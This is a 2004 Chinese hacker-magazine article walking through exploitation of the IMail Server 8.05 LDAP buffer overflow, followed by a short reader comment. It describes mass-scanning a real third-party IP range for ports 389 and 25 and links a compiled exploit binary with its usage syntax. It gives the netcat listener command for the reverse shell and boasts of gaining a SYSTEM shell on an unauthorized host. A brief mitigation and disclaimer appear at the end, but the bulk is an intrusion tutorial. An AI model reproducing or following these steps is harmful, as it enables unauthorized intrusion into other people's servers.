文章作者：lcx 发于<<黑客在线>>2004年第4期

IMail Server是一个应用在windows平台下的高性能的，基于标准的SMTP/POP3/IMAP4/LDAP邮件服务器。由于具备简单直观的图形用户界面、多域名支持、远程管理、Web邮件、可创建邮递清单、反垃圾邮件支持等等功能，所以在互联网上赢得不少用户青睐。但不幸地是，它的安全性却令人不敢恭维，随着版本的不断升级，其缓冲区溢出漏洞也层出不穷。在8.05版本前，网上曾经公布过IMail SMTP 、IMail LDAP Server、IMail Web Messaging HTTP Get、 IMail网络日历等缓冲区溢出漏洞。此次最新版本的IMail Server V8.05发布不久，国外的牛人就发现了溢出漏洞，其Server LDAP缓冲区溢出漏洞卷土重来。

安装有IMail Server V8.05软件的服务器端程序上会存在一个名为IMail LDAP Server的服务程序，默认状态下，该服务被系统自动开启，如上图所示。

该项服务即存在远程缓冲区溢出漏洞，可以使攻击者在远程系统上执行任何命令。目前，受此影响的系统为windows2000sp0-sp4和winxp所有版本。具体溢出 IMail Server V8.05的漏洞原理和技术细节，请去发现此漏洞的网站www.coromputer.net查看，这个不在本文讨论范围。
相信广大黑迷最关心的就是如何利用IMail Server V8.05缓冲区溢出漏洞来入侵了。我们通过一些端口查看软件就会发现，存在IMail LDAP Server服务的服务器，就会自动开放系统的389端口。所以在拿到针对此漏洞的exploit后，我就用portready对210.74.xxx.xxx网段大面积扫描tcp389和tcp25端口。也许你要问为什么要同时扫25端口，是因为装有邮件服务器的主机也会开放此端口，并且我们也可以通过此25端口的标识来认别服务器是否装的为IMail Server V8.05版本。

就可以测试溢出了。
测试利用的代码为imail.c，你可以在www.coromputer.net下载得到。我用vc++直接编译成功的软件，放在此url下www.haiyang.net/safety/imail.exe。imail.exe的使用界面如上图所示

使用非常简单：
imail <host> <your_ip> <your_port> <version> [OSver]。为照顾菜鸟，我来解析一下该命令意思：imail <漏洞主机ip><你的机器ip> <你监听的端口> <imail的不同版本，分别对应0/1/2> <系统版本2000为0，xp为1>。imail.exe需要先用瑞士军刀nc在本地监听一个不用的端口，使用命令为
nc -vv -l -p 5555(我监听的端口为5555)。
监听好端口后就要开始溢出测试了。先说明一下，我上网的方式为adsl，具备一个外网ip:218.59.108.188。来测试一下我扫到的如图3所示的主机吧：

命令行中imail的版本写的数字为0，系统版本我也用的是0，这儿我都是估计的，不成功的话我们可以再去换个版本代码测试吗！经我测试，用这两个数字的话，程序的成功率还是相当高的。我们回到刚才用nc监听的端口，略为等待十几秒或几十秒，果然就得到了210.74.xxx.xxx的系统权限的shell，而且该系统是w2k+sp4补丁，剩下的事情应当是可以让我们为所欲为了。这样简单有劲的入侵，只有一个字可以形容，那就是“爽”呀

另外，我实战还发现，此缓冲区溢出还可以重复溢出，也就是说不成功的话，你可以反复溢出测试不同的version和OSver代码。
目前对该项漏洞，imail厂家没有发布任何补丁，变通的办法我这儿有一个，那就是停止IMail LDAP Server服务或用tcp/ip筛选屏掉服务器的389端口。另外，如果广大的读者要测试此漏洞的话，我要提醒你三点。一是只有装有IMail Server V8.05的服务器，同时开放389和25口才可以成功。二是溢出后，那个反向连接的shell会比较慢，最慢时要等几十秒，这根据你远程主机和你本机的网速而定。三是IMail Server V8.05缓冲区溢出漏洞属于比较严重的漏洞，lcx提醒读者不要利用本篇提到的内容搞破坏。

这个就是我一直在找的东西啊！~~~~呵呵~~~
不过不知道现在还可以利用不~~~~